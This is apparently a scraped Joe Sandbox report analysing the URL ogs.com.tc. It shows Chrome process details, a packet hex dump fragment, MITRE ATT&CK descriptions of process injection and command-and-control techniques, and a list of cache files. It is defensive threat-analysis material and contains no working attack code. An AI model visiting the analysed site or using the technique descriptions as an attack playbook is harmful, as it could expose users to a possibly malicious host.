6f de bc 3b c1 31 03 00 84 16 7f 87 f0 d2 1f b5 08 0b 82 2e fa 94 c2 14 82 88 b4 f1 63 91 d2 Data Ascii: cKGBoe'@99\|s!7f9kxp;t\|j~T;L.o2DPgjig%wGc Y_TV._Ep!h#u54cg={+N8Ql\|d2vy`=o;1.c

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5856, Parent PID: 2664

General

Target ID:	0
Start time:	18:17:04
Start date:	25/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4340, Parent PID: 5856

General

Target ID:	2
Start time:	18:17:08
Start date:	25/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2208,i,2536867606534393903,12110685460829100041,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6400, Parent PID: 2664

General

Target ID:	3
Start time:	18:17:10
Start date:	25/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.ogs.com.tc/"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://www.ogs.com.tc/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 100

Chrome Cache Entry: 101

Chrome Cache Entry: 102

Chrome Cache Entry: 103

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 62

Chrome Cache Entry: 63

Chrome Cache Entry: 64

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Windows Analysis Report
https://www.ogs.com.tc/